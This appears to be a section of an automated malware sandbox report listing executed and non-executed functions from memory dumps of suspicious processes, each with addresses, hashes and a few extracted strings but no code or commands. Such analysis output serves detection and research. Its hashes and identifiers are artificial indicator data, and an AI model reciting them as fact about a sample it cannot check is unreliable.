                                                            Function 00007FFD348C0B95 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction ID: c154938c16a525fdf857ba6626286a957b45f9466d3e0071d2a467cd4c41fba7
                                                            • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction Fuzzy Hash: 27D0A930228A4E8FDA00B738C98A824BBA0FF0F211FC910E2E008C71A2D60888A98700
                                                            Function 00007FFD348C06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction ID: 442dc15e508d7935a85261fac26fade55ae7292c8ea774ecb432a3280e382c72
                                                            • Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction Fuzzy Hash: 8FC08C00F4AA0F00B8013BAE6AE28ACE1005BC7290FD00173D38CD00C19C0D28C92146
                                                            Function 00007FFD348C12B0 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction ID: 123c848a4e645bee00bc2af7c6e91ce59755d7f613d84a7d777275ad23236556
                                                            • Opcode Fuzzy Hash: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction Fuzzy Hash: 80C08C305108088FC908EB28C88490473A0FB0A300BC10090E409C7170D21ADCC1D780
                                                            Function 00007FFD348C4C37 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ef23dc710cb218281e9e1f1d58a968f487d3c146dab683f5bc78cb6da46e815d
                                                            • Instruction ID: f7c8c926bbf69f74949ecad40f0f809d84c22ec152fd4aee863a13a5836d4d57
                                                            • Opcode Fuzzy Hash: ef23dc710cb218281e9e1f1d58a968f487d3c146dab683f5bc78cb6da46e815d
                                                            • Instruction Fuzzy Hash: 4AC08C00F0881642F2A4228400706BD04064F84304F444034E20DE73CACD2C2D0112C6
                                                            Function 00007FFD348C06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction ID: 1c4f5c0111124fee5384508ee65e6f7542f593500edba06c9389d6db76b991e8
                                                            • Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction Fuzzy Hash: 34B01200E9680F00A40433BE1AD2464F0405B47100FC001B1E64DC0081984D18982242
                                                            Function 00007FFD348C1FF7 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction ID: 55252199ed19cb96bde582cfd1c8a5c615e471d3b4946d96743d0f193e9c5a00
                                                            • Opcode Fuzzy Hash: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction Fuzzy Hash: 0CC02230F0800C80EB28833088A20FBB2028F83308F0A82F3820AFB282CC3C2C003A00

                                                            Non-executed Functions

                                                            Function 00007FFD348C09B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: cf18bcfa04e7a80f2f2789b2b5c5e16f18439eba0b7fdd0456b99321cbdd8157
                                                            • Instruction ID: d117e3124f1d64f5f403a495a1051e38e5271117855dca1552df5fa48dea6fc9
                                                            • Opcode Fuzzy Hash: cf18bcfa04e7a80f2f2789b2b5c5e16f18439eba0b7fdd0456b99321cbdd8157
                                                            • Instruction Fuzzy Hash: D141C003B0852326E12233FD76720FE6B689F82375B4C5277E14CAA0935DB874C682E5

                                                            Executed Functions

                                                            Function 00007FFD348A0D4C Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5Z_H
                                                            • API String ID: 0-3267294416
                                                            • Opcode ID: 089552555f289a2e761e1506eafa38eda029edb9b08073553982677bd3cef838
                                                            • Instruction ID: 64955b93e7776c6a9833734a3b853be7cbb0cf2c0f8c284ff7c98ca524ba77a5
                                                            • Opcode Fuzzy Hash: 089552555f289a2e761e1506eafa38eda029edb9b08073553982677bd3cef838
                                                            • Instruction Fuzzy Hash: D691E375A09A898FE799DF6888B53A97FE1FF56300F4401BEC149E72D2CBB92811C750
                                                            Function 00007FFD348D1000 Relevance: .4, Instructions: 394COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348d1000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 33bccc1f7a324fc651be0e85188349ecef622ede403829aea50a741d7546f922
                                                            • Instruction ID: fb68d9cd5a5364759f3e8892a0b7bde79d969f20dfca159cc5ddc75ffcb54f28
                                                            • Opcode Fuzzy Hash: 33bccc1f7a324fc651be0e85188349ecef622ede403829aea50a741d7546f922
                                                            • Instruction Fuzzy Hash: 21A15A21A6F65A06E31D9A1C48E30B573C2EF93606B29537DCEDBC748BDD1C681786C1
                                                            Function 00007FFD348D332D Relevance: 2.8, Strings: 2, Instructions: 332COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348d1000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @ax4$M
                                                            • API String ID: 0-1856302214
                                                            • Opcode ID: b1066d0c5718e4e27a357b1ef8439cc5f0bb13bf38e88c251ffe5f2eb09948d0
                                                            • Instruction ID: e9046481b82589e70d1b6d34c98e748535bf711bdffa1e348a1e30956922b37f
                                                            • Opcode Fuzzy Hash: b1066d0c5718e4e27a357b1ef8439cc5f0bb13bf38e88c251ffe5f2eb09948d0
                                                            • Instruction Fuzzy Hash: C8A1C321B1E94A0FEB98EB6984B62B577D1FF96310F04427AD50DC7283DD2CBC459341
                                                            Function 00007FFD348D3365 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348d1000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @ax4
                                                            • API String ID: 0-890708349
                                                            • Opcode ID: b6ce0d5dc0f021417befcffd777caa4b6999819b553611de0481bfca446b590a
                                                            • Instruction ID: a60c2fd5792afdb12bc88d2efc749037853e1d2e6261c5f4af1ae40f8f352501
                                                            • Opcode Fuzzy Hash: b6ce0d5dc0f021417befcffd777caa4b6999819b553611de0481bfca446b590a
                                                            • Instruction Fuzzy Hash: 1071A221B1E94A0FEB98EBA984B63B573D2EF96310F44427AD50DC7287DD2CAC459380
                                                            Function 00007FFD348A07D0 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HAy4
                                                            • API String ID: 0-3522526771
                                                            • Opcode ID: a427ab13864f14b98dd6a39544850d04bb5ee5ea11312724d99568a853c249ad
                                                            • Instruction ID: a7948eb87be0f0529a7c3fba2485c21e84a37e0bc2bc83d6a211baf54d2857f8
                                                            • Opcode Fuzzy Hash: a427ab13864f14b98dd6a39544850d04bb5ee5ea11312724d99568a853c249ad
                                                            • Instruction Fuzzy Hash: A8313821A0E6890FE7969B3888751E93FB0EF87310F0945F7D549C70E3D92CA90697A2
                                                            Function 00007FFD348D2E99 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348d1000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: a39d08684b2cb14e18750592956dc910fbef330e3de415f237d3631438909d37
                                                            • Instruction ID: e259c51a475d9347715553e063ece3612859e0be77119767b07b7890002dac3d
                                                            • Opcode Fuzzy Hash: a39d08684b2cb14e18750592956dc910fbef330e3de415f237d3631438909d37
                                                            • Instruction Fuzzy Hash: DFF0656150E7C44FD716973848694557FA0EF6721174A52EEC046CF1A7EA1DCC85C711
                                                            Function 00007FFD348D1BB9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348d1000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: e2713da73351a736908ee7d02c33d8928c20dd8027455ec5eafd06969740177e
                                                            • Instruction ID: 8a1433d5f0533c36ea8f1adeca120b0081a674ba5ae5132ce5d4c6d7bbc4b052
                                                            • Opcode Fuzzy Hash: e2713da73351a736908ee7d02c33d8928c20dd8027455ec5eafd06969740177e
                                                            • Instruction Fuzzy Hash: C5E0923064F3C08FCB06EA3484A89547FA0EE6720174A52EEC486CF1A3DA2DC88AC701
                                                            Function 00007FFD348D8169 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348d1000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 1cd2b15bd9cb6d79975f0bec3b6ffa68956861c3c940415b547a8b587f651a7f
                                                            • Instruction ID: 77bd839df359a662b75f7d3bf71f7860d8486d28babe6d1965c5041436dc9ac9
                                                            • Opcode Fuzzy Hash: 1cd2b15bd9cb6d79975f0bec3b6ffa68956861c3c940415b547a8b587f651a7f
                                                            • Instruction Fuzzy Hash: 0CE01A7154F3C04FCB16AB3488768553FA0EE6B21078B41EEC14ACF1B3E62D8849C711
                                                            Function 00007FFD348C9619 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348c3000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 5e51f85ff0d387b4ec77d45699806c37c22464e9266dac9e07d7ddc45da4590c
                                                            • Instruction ID: 3863289434739c7a4ca5fcf1232860b1c845a8c6ef0a832ee2fe3977066e50fd
                                                            • Opcode Fuzzy Hash: 5e51f85ff0d387b4ec77d45699806c37c22464e9266dac9e07d7ddc45da4590c
                                                            • Instruction Fuzzy Hash: A9E01A6154E7C04FCB1AEB74887A8457FA0AE6721078A40EEC14ACF1B3E62DC849C712
                                                            Function 00007FFD348DAD19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348d1000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 383c225fbd3be67579f1a8e354bf21850fe743b6956195d3f9ad572fb5ac8c6c
                                                            • Instruction ID: 8b311285287da71433212288cf7cd673102ad56066382f6e6f0fdc2c1b2fb5c5
                                                            • Opcode Fuzzy Hash: 383c225fbd3be67579f1a8e354bf21850fe743b6956195d3f9ad572fb5ac8c6c
                                                            • Instruction Fuzzy Hash: 87E01A7194F7D44FCB06EB7488698447FA0EE6B21178B41EEC146CF1B3E62D8849C701
                                                            Function 00007FFD348D1C49 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348d1000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: a28f3aeead4e25cdc0bbd14db2c927b2818b14a8c51a4d4b1195805721be8802
                                                            • Instruction ID: fdfbd0910cebb5e42ba38f2d06bf7c265dddb8bc8b996cc7b255c5e7697bfe74
                                                            • Opcode Fuzzy Hash: a28f3aeead4e25cdc0bbd14db2c927b2818b14a8c51a4d4b1195805721be8802
                                                            • Instruction Fuzzy Hash: CEE01A7154F7C04FCB4AEB3488698547FB0AE67210B8B41EEC145CF1B3E62E8849C701
                                                            Function 00007FFD348C97C9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348c3000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: b9c0b8045df9e822ac35a273f15009519ae119eddb090cfae96767b524afaefb
                                                            • Instruction ID: 65eb47ef1913af74af1ded87326ffe867afa01ec732c0f24d504631993310b1b
                                                            • Opcode Fuzzy Hash: b9c0b8045df9e822ac35a273f15009519ae119eddb090cfae96767b524afaefb
                                                            • Instruction Fuzzy Hash: 68E0E56154E7C04FCB06EB7488698447FA0AE6721078A40EEC146CB1A3E62D8849C701
                                                            Function 00007FFD348C9801 Relevance: .2, Instructions: 245COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348c3000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 05fed746873c184705e784dfd72003cab8d40ff9907a1cecca7065f898a9fc25
                                                            • Instruction ID: 02033520dd1bb3925068ae103e5beeb18c52986df28a112eb0e780eae7f246ff
                                                            • Opcode Fuzzy Hash: 05fed746873c184705e784dfd72003cab8d40ff9907a1cecca7065f898a9fc25
                                                            • Instruction Fuzzy Hash: CA81A231B1890A4FEB94EB68C4A56A977E1FF59310F5141BAD10DD72D2DF38AC42CB80
                                                            Function 00007FFD348A08D0 Relevance: .2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cef8b4056051369c930d34092bc68cbe1e734672fcdbed888d8978df259c8dbc
                                                            • Instruction ID: 7ca4256b75a911876a4250330195de7fc58540ea9da35476acff7589001db14f
                                                            • Opcode Fuzzy Hash: cef8b4056051369c930d34092bc68cbe1e734672fcdbed888d8978df259c8dbc
                                                            • Instruction Fuzzy Hash: 6C411422B0C6650FE754B7FCA0BA2FAB795DF86325B0844BBD54DC71D3DDA8B8418284
                                                            Function 00007FFD348DAEB4 Relevance: .2, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348d1000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e4913dd4d1cb4e73e7b5be41d555486d4baff160bfe3c33d69064ed447901eb6
                                                            • Instruction ID: 7d76298a381d181e6f3a2b9722419dcbfe482bbdb56e88d04c41f532b53a3cf9
                                                            • Opcode Fuzzy Hash: e4913dd4d1cb4e73e7b5be41d555486d4baff160bfe3c33d69064ed447901eb6
                                                            • Instruction Fuzzy Hash: 9741C862B1A94A4FEB98E75C94F56F473D1EB9A310F1542B6D50DD32C2CD2C7C419740
                                                            Function 00007FFD348A090D Relevance: .1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e66506be62dd4db8cac5e43d50b46734e17c3b97326ee394f34d57783434ca6f
                                                            • Instruction ID: 4ef26db9b7b52c40f8a9530bfdba32b0d4808cf8c0812b127dcdcbb88f0ad879
                                                            • Opcode Fuzzy Hash: e66506be62dd4db8cac5e43d50b46734e17c3b97326ee394f34d57783434ca6f
                                                            • Instruction Fuzzy Hash: F041E322B0C6651FE764B7FC60BA6F9B795DF86321B08447AD14DC71D3DDA8B8418284
                                                            Function 00007FFD348A0908 Relevance: .1, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction ID: b95c0fddba714cae56ebba2eec607c2e8af1ad826bfc272167ce991942ba75b3
                                                            • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction Fuzzy Hash: 26210A3170DC184FE7A8EB0CE889DB973D1EF9A32170105BAE58EC7125E951EC8287C1
                                                            Function 00007FFD348A4525 Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07ef623e43e81f330622f2f54a03eb5d4cd6641417e12caa4f84606802083404
                                                            • Instruction ID: c72533d5cb17247a87bb1c533d6d5b87f0d4f81b654bc3262004b07077e8c00b
                                                            • Opcode Fuzzy Hash: 07ef623e43e81f330622f2f54a03eb5d4cd6641417e12caa4f84606802083404
                                                            • Instruction Fuzzy Hash: C3312020F0A91A4FEFD4EB2484A57B862D2FF5B700F5400B5D60ED7292DEACAC40A711
                                                            Function 00007FFD348A116D Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 577906e6478e79d6bf01e7caf8466d7481c954916c04ff6c0bb73580eeab3964
                                                            • Instruction ID: 9a14ac7cdb279f6ee481df7b3a8c653c5a1a14bc7c6fcf4faeffedb40c2ab924
                                                            • Opcode Fuzzy Hash: 577906e6478e79d6bf01e7caf8466d7481c954916c04ff6c0bb73580eeab3964
                                                            • Instruction Fuzzy Hash: A631A231A0D64A8FDB85EB68C8A5AA977F0FF5A300B0545BAC009D7193DE79A841CB50
                                                            Function 00007FFD348A0998 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9691d792c55b3d3d1974f5761b2af6fb345ff1557b5734232521eafe63c6a12
                                                            • Instruction ID: 19ee39c4927208949236e2a1ad61f824bbc44f729b4a6a02e9af9f241984a610
                                                            • Opcode Fuzzy Hash: c9691d792c55b3d3d1974f5761b2af6fb345ff1557b5734232521eafe63c6a12
                                                            • Instruction Fuzzy Hash: 3A212C20B199590FEBD8F76C54BA6B976C6DB9A311F1040BDE50DC33D3DD68AC418250
                                                            Function 00007FFD348A0C25 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 236cf25825770f7b006d839e398e51a1b2dec7fb2fa10cd83ca1c68d0ad90e9a
                                                            • Instruction ID: fdab3cff6af208bbab6acc08e01a21042412c9e62ed33bb1b25778f1a9e79b67
                                                            • Opcode Fuzzy Hash: 236cf25825770f7b006d839e398e51a1b2dec7fb2fa10cd83ca1c68d0ad90e9a
                                                            • Instruction Fuzzy Hash: 75212936F0E6599FE712ABB898A10EC7B60EF43321F0441B3D248CB083E97C65469791
                                                            Function 00007FFD348DC0B1 Relevance: .1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348d1000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce73290fcf8ca2d652c4a4cd191fa3368224d49c3f0918891fd525af61528998
                                                            • Instruction ID: fe48fa3b33e22a50218875c0e7f352a777f44233c37384ad97f087fb915abc8b
                                                            • Opcode Fuzzy Hash: ce73290fcf8ca2d652c4a4cd191fa3368224d49c3f0918891fd525af61528998
                                                            • Instruction Fuzzy Hash: 96115B22E0F6894FDB25A76548AA5E97FA0FF57320F4802BBE50CC7093D92D68458382
                                                            Function 00007FFD348D2339 Relevance: .1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348d1000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc92596cf6df3908c40b78712adb02d01e50996e851e9827f9a2892421717afc
